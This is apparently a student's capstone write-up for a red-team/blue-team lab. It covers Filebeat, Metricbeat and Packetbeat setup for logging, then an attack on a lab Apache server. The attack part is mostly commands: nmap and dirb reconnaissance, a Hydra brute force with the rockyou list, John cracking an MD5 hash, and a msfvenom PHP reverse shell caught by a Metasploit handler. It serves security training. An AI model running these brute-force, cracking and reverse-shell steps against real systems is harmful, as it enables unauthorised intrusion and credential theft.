Project Write Up RedTeam vs. BlueTeam Devices Kali Capstone Elk Set Up Beats Need to set up beats in order to log the attacks. Steps to set up: Log into Capstone vagrant:tnargav sudo su filebeat modules enable apache filebeat setup metricbeat modules enable apache metricbeat setup packetbeat setup systemctl restart filebeat systemdtl restart metricbeat systemctl restart packetbeat Attacking Capstone Determine capstone ip First find kali ip ifconfig 192.168.1.90 Run nmap against 192.168.1.1/24 nmap 192.168.1.1/24 Did not give enough information to determine what machine is which nmap -sV 192.168.1.1/24 192.168.1.100 Elastic Search | Ubuntu 192.168.1.105 Apache | Ubuntu Open http://192.168.1.105 Try to find "secret" page dirb http://192.168.1.105 Returned http://192.168.1.105/server-status Access Forbidden http://192.168.1.105/webdav Username:Password Protected dirb http://192.168.1.105/company_folders Returned 0 Scrolled through pages Error file missing please refer to company_folders/secret_folder Run Hydra against http://192.168.1.105/company_folders_secret_folder Find Wordlist locate rockyou cd /usr/share/wordlists ls gunzip rockyou.txt.gz ls to verify successful unzip hydra help To see all avaliable flags Ashton manages secret folder Means username is ashton hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder ashton:leopoldo Open connect to corp server webdav log in with ryans account ryan password hash d7dad0a5cd7c8376eeb50d69b3ccd352 echo d7dad0a5cd7c8376eeb50d69b3ccd352 > hash.txt john hash.txt john -show hash.txt ryan:linux4u Upload reverse php to webdav msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=4445 -f raw > exploit.php Create Listener msf console use exploit multi/handler set LHOST 192.168.1.90 set LPORT 4445 set exploit php/reverse_php exploit Open exploit.php in web to run on remote server Meterpreter session cd / ls cat flag.txt